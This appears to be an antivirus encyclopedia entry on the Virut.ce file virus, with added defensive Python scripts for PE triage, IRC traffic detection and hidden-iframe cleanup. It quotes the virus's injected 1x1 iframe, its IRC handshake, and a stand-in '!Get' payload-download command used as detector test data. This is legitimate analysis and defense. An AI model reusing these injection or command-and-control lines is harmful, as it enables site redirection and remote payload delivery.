
Virus.Win32.Virut.ce

Detected Oct 29 2009 14:07 GMT
Released Jan 09 2013 12:15 GMT
Published Oct 29 2009 14:07 GMT



Technical Details

This file virus infects Windows executable files: its malicious code is stored inside Windows PE EXE files. The virus body is about 17 KB, but because it is polymorphically encrypted the size varies from one infected file to the next.

Propagation

The virus injects its code into the address space of every process running in the system. The injected code hooks the following functions in the ntdll.dll library:

NtCreateFile
NtCreateProcess
NtCreateProcessEx
NtOpenFile
NtQueryInformationProcess

Through these hooks the virus sees every file that is opened and every application that is launched. When it observes a new process starting or an executable file being opened, it infects that file. Only Windows PE EXE applications with the .EXE and .SCR extensions are infected, and files whose names contain any of the strings “WINC”, “WCUN”, “WC32” or “PSTO” are skipped. To infect a file, the virus enlarges a PE section, writes its polymorphic body into the added space, and then redirects the program’s entry point so that execution starts in the virus code.
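The infection method described above leaves a structural trace that can be checked without a signature: the entry point of an infected file no longer points into the original code section. The following triage script is an added example, not Kaspersky's code and not the virus's own logic. It parses PE headers with the Python standard library only and flags executables whose entry point lies in the last section, outside the first code section, or in a section that is both writable and executable. The two PE images it examines are constructed inline (header-only, no real code) and the section layout of the "infected-style" image is an assumption modelled on the description, not taken from a real sample.

```python
"""Heuristic check for an entry-point-hijacking file infector of the Virut type.

Added example (not Kaspersky's code). Parses PE32/PE32+ headers with the
standard library and reports layouts typical of an appended, entry-point-
redirected virus body. The sample images below are constructed, header-only
blobs with no real code in them.
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_pe(data):
    """Return (entry_point_rva, sections) from a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    sections = []
    for i in range(num_sections):
        off = opt + size_opt + 40 * i                          # IMAGE_SECTION_HEADER
        name, vsize, va, raw_size = struct.unpack_from("<8sIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]    # Characteristics
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "raw_size": raw_size, "chars": chars})
    return entry_rva, sections


def analyze(data):
    """Return a list of findings; an empty list means nothing suspicious."""
    entry_rva, sections = parse_pe(data)
    findings = []
    ep_idx = None
    for i, s in enumerate(sections):
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw_size"]):
            ep_idx = i
            break
    if ep_idx is None:
        return [f"entry point 0x{entry_rva:x} lies outside every section"]
    ep = sections[ep_idx]
    if len(sections) > 1 and ep_idx == len(sections) - 1:
        findings.append(f"entry point in last section {ep['name']}")
    first_code = next((i for i, s in enumerate(sections)
                       if s["chars"] & IMAGE_SCN_CNT_CODE), None)
    if first_code is not None and ep_idx != first_code:
        findings.append(f"entry point not in first code section {sections[first_code]['name']}")
    if ep["chars"] & IMAGE_SCN_MEM_WRITE and ep["chars"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append(f"entry section {ep['name']} is writable and executable")
    return findings


def build_pe(sections, entry_rva):
    """Construct a header-only PE32 image (test data only, not a runnable binary)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    table = b"".join(struct.pack("<8sIIIIIIHHI", name, vsize, va, raw, ptr, 0, 0, 0, 0, chars)
                     for name, va, vsize, raw, ptr, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


TEXT = (b".text", 0x1000, 0x800, 0x800, 0x400,
        IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
# Clean layout: small read/write .data, entry point inside .text.
CLEAN = build_pe([TEXT, (b".data", 0x2000, 0x200, 0x200, 0xC00,
                         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
                 0x1100)
# Infected-style layout (assumed): last section grew by about 17 KB, became
# executable, and the entry point now points into it.
INFECTED = build_pe([TEXT, (b".data", 0x2000, 0x4600, 0x4600, 0xC00,
                            IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
                            | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE)],
                    0x2200)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("infected-style", INFECTED)):
        print(label, analyze(image) or "no findings")
```

Treat the output as a triage signal, not a verdict: runtime packers such as UPX also place the entry point in a late, writable and executable section, so hits need a second look (unpacking, or a scan with current signatures) before a file is declared infected.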


Payload

The virus adds the executable of the process it is running in to the Windows Firewall list of trusted (authorized) applications, so that its own network connections are not blocked.

It then disables the “Restore system files” function.

The virus attempts to contact the following IRC servers:

prox*****ircgalaxy.pl
irc*****ef.pl
If a connection is established, the virus registers with the server by sending the following commands:
NICK dewxxpyi
USER b
JOIN #.<rnd1>, where rnd1 is a random number.
The virus then waits for commands from the malicious IRC server and executes them.

The virus is capable of executing the following commands:

  • !Get: download malicious code from the Internet and inject it into processes running on the victim computer.
  • !hosu: open the specified URLs on the victim computer.
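The handshake and the two bot commands above are visible in cleartext on the wire, which makes them a usable network indicator. The detector below is an added example (not Kaspersky's code): it parses RFC 1459 IRC lines from a reassembled conversation and alerts on a JOIN to a channel of the form "#.<number>", on a USER registration with fewer than the four parameters the RFC requires (the bot's "USER b"), and on a PRIVMSG whose first word is !Get or !hosu. The two sample conversations, the channel number and the hostnames are constructed.

```python
"""Flag the Virut.ce IRC handshake and bot commands in a captured conversation.

Added example, not Kaspersky's code. Input is a list of IRC lines as they
appear on the wire (both directions); the sample streams are constructed.
"""
import re

CHANNEL_RE = re.compile(r"^#\.\d+$")        # "#.<rnd1>": a random number after "#."
BOT_COMMANDS = {"!get", "!hosu"}


def parse_line(line):
    """Split one IRC line into (prefix, COMMAND, params) per RFC 1459."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:                          # trailing parameter may contain spaces
        head, _, trailing = line.partition(" :")
        params = head.split() + [trailing]
    else:
        params = line.split()
    if not params:
        return prefix, "", []
    return prefix, params[0].upper(), params[1:]


def assess_stream(lines):
    """Return alert strings for one reassembled IRC conversation."""
    alerts = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if not line:
            continue
        prefix, cmd, params = parse_line(line)
        if cmd == "USER" and len(params) < 4:
            # RFC 1459 USER takes <user> <mode> <unused> <realname>; "USER b" is truncated.
            alerts.append(f"malformed USER registration: {line}")
        elif cmd == "JOIN" and params:
            for chan in params[0].split(","):
                if CHANNEL_RE.match(chan):
                    alerts.append(f"join to Virut-style channel {chan}")
        elif cmd == "PRIVMSG" and len(params) >= 2:
            first_word = params[-1].strip().split(" ", 1)[0].lower()
            if first_word in BOT_COMMANDS:
                alerts.append(f"bot command {first_word} from {prefix or 'client'}: {params[-1]}")
    return alerts


# Constructed sample: an ordinary IRC session.
BENIGN = [
    "NICK alice",
    "USER alice 0 * :Alice Example",
    "JOIN #linux",
    ":bob!b@example.invalid PRIVMSG #linux :hello alice",
]

# Constructed sample: the handshake from the description plus two operator commands.
VIRUT_LIKE = [
    "NICK dewxxpyi",
    "USER b",
    "JOIN #.4821",
    ":irc.example.invalid 001 dewxxpyi :Welcome to the network",
    ":op!op@example.invalid PRIVMSG #.4821 :!Get http://example.invalid/payload.exe",
    ":op!op@example.invalid PRIVMSG #.4821 :!hosu http://example.invalid/ads",
]

if __name__ == "__main__":
    for label, stream in (("benign", BENIGN), ("virut-like", VIRUT_LIKE)):
        print(label, assess_stream(stream) or "no alerts")
```

The JOIN and USER checks fire before any command is issued, so they catch a freshly infected host while it is only idling in the channel; the command check is what identifies an active operator session.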

The virus also scans the victim computer’s hard drive for files with the following extensions:

HTM
PHP
ASP

Into every such file it finds, it inserts the following hidden 1x1 iframe, which turns the victim’s web content into a redirector to the attacker’s site:
<iframe src="http://****.pl/rc/" width=1 height=1 style="border:0"></iframe>
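Cleaning a web root after an infection means finding every copy of that injected element, and the marker to key on is the geometry rather than the domain, which changes between campaigns. The scanner below is an added example (not Kaspersky's code): it walks a directory for HTM/HTML/PHP/ASP files, reports every iframe that is at most 1x1 or hidden by CSS, and can return a cleaned copy of a file with those elements removed. The sample files and the URL in them are constructed placeholders.

```python
"""Find and strip hidden iframes of the kind Virut.ce injects into web files.

Added example, not Kaspersky's code. Generalizes the quoted injection to any
iframe that is at most 1x1 or hidden via CSS. Sample files are constructed.
"""
import re
import tempfile
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe\s*>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""", re.IGNORECASE)
TARGET_EXT = {".htm", ".html", ".php", ".asp"}


def _attrs(element):
    """Attributes of the opening tag only, lower-cased names, quotes stripped."""
    open_tag = element[:element.index(">") + 1]
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(open_tag)}


def _px(value):
    """Leading integer of a width/height value ("1", "1px"), or None if absent."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def is_hidden_iframe(attrs):
    """True for a 1x1 (or smaller) iframe or one hidden through its style."""
    w, h = _px(attrs.get("width")), _px(attrs.get("height"))
    tiny = w is not None and h is not None and w <= 1 and h <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    hidden = "display:none" in style or "visibility:hidden" in style
    return tiny or hidden


def suspicious_iframes(text):
    """Return the src of every hidden iframe in the text, in document order."""
    return [_attrs(m.group(0)).get("src", "<no src>")
            for m in IFRAME_RE.finditer(text)
            if is_hidden_iframe(_attrs(m.group(0)))]


def strip_hidden_iframes(text):
    """Return a copy of text with hidden iframes removed; visible ones are kept."""
    return IFRAME_RE.sub(
        lambda m: "" if is_hidden_iframe(_attrs(m.group(0))) else m.group(0), text)


def scan_tree(root):
    """Map each HTM/HTML/PHP/ASP file under root to the hidden-iframe srcs it contains."""
    results = {}
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in TARGET_EXT:
            hits = suspicious_iframes(p.read_text(errors="replace"))
            if hits:
                results[p.name] = hits
    return results


# Constructed samples: one injected page, one page with a legitimate embed,
# and a non-web file the virus would not touch.
SAMPLES = {
    "index.htm": ('<html><body><h1>Site</h1></body></html>\n'
                  '<iframe src="http://example.invalid/rc/" width=1 height=1\n'
                  'style="border:0"></iframe>'),
    "about.php": ('<?php echo "hi"; ?>'
                  '<iframe src="https://example.invalid/map" width="600" height="400"></iframe>'),
    "notes.txt": '<iframe src="http://example.invalid/rc/" width=1 height=1 style="border:0"></iframe>',
}


def scan_samples():
    """Write the constructed samples to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        for name, body in SAMPLES.items():
            Path(d, name).write_text(body)
        return scan_tree(d)


if __name__ == "__main__":
    print(scan_samples())
```

Run the cleanup only after the host has been disinfected: while the virus is still resident it re-scans the drive and reinjects the element.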

Removal instructions

If your computer does not have an up-to-date antivirus solution, or has no antivirus at all, update your Kaspersky Anti-Virus databases and perform a full scan of the computer to delete the malicious program.


Virus

Viruses replicate on the resources of the local machine.

Unlike worms, viruses do not use network services to propagate or to penetrate other computers. A copy of a virus reaches a remote computer only if the infected object is activated there for a reason unrelated to the virus’s own functionality. For example:

  • when infecting accessible disks, a virus penetrates a file located on a network resource
  • a virus copies itself to a removable storage device or infects a file on a removable device
  • a user sends an email with an infected attachment.

Aliases

Virus.Win32.Virut.ce (Kaspersky Lab) is also known as:

  • Virus.Win32.Sality.ae (Kaspersky Lab)
  • Trojan.Win32.Genome.aeywa (Kaspersky Lab)
  • Trojan.Win32.Vilsel.bevv (Kaspersky Lab)
  • Email-Worm.Win32.Brontok.se (Kaspersky Lab)
  • Email-Worm.Win32.Brontok.sd (Kaspersky Lab)
  • Trojan.Win32.Genome.sdlo (Kaspersky Lab)
  • Worm.Win32.AutoRun.bzax (Kaspersky Lab)
  • Worm.Win32.AutoRun.byqn (Kaspersky Lab)
  • Trojan.Win32.Autoit.aji (Kaspersky Lab)
  • IM-Worm.Win32.VB.akl (Kaspersky Lab)
  • Worm.Win32.Zombaque.l (Kaspersky Lab)
  • Worm.Win32.AutoRun.hmn (Kaspersky Lab)
  • Trojan.Win32.Refroso.cbmr (Kaspersky Lab)
  • Trojan-PSW.Win32.QQPass.xqo (Kaspersky Lab)
  • Worm.Win32.VB.bbo (Kaspersky Lab)
  • Trojan.Win32.Vilsel.cfb (Kaspersky Lab)
  • Hoax.Win32.Sality.ae (Kaspersky Lab)
  • P2P-Worm.Win32.Sality.ae (Kaspersky Lab)
  • Trojan-Downloader.Win32.Virut.ce (Kaspersky Lab)
  • Trojan-SMS.Win32.Virut.ce (Kaspersky Lab)
  • Trojan.Win32.Virut.ce (Kaspersky Lab)
  • Hoax.Win32.Virut.ce (Kaspersky Lab)
  • Backdoor.Win32.Virut.ce (Kaspersky Lab)
  • Worm.Win32.AutoRun.fya (Kaspersky Lab)
  • Backdoor.Win32.IRCBot.ihd (Kaspersky Lab)
  • Virus: W32/Virut.n.gen (McAfee)
  • W32.Changeup.8657 (Symantec)
  • W32.Virut.CF.37843 (Symantec)
  • W32/Scribble-B (Sophos)
  • W32/Sality.AO (Panda)
  • Virus:Win32/Virut.BN (MS(OneCare))
  • Win32.Virut.56 (DrWeb)
  • Win32.Virtob.Gen.12 (BitDef7)
  • Win32.Virut.AB.Gen (VirusBuster)
  • Win32:VB-YDQ [Trj] (AVAST)
  • Gen.Trojan.Heur (Ikarus)
  • Trojan.Win32.Spy (Ikarus)
  • Win32/DH.FF81010B{40580000-00001000-00000000-00000000} (AVG)
  • Win32/Virut (AVG)
  • W32/Virut.gen (AVIRA)
  • W32/Virut.HL (Norman)
  • W32/Virut.EH (Norman)
  • Win32.Virut.dy (Rising)
  • Win32.Virtob.Gen.12 [Aquarius] (FSecure)
  • PE_VIRUX.R (TrendMicro)
  • Virus.Win32.Virut.ce (v) (Sunbelt)
  • Virus.Win32.Virut.ce.5 (v) (Sunbelt)
  • Win32.Virut.AB.Gen (VirusBusterBeta)
  • W32/Virut.CE (Fortinet)
  • Win32.Virtob.Gen.12 (GData)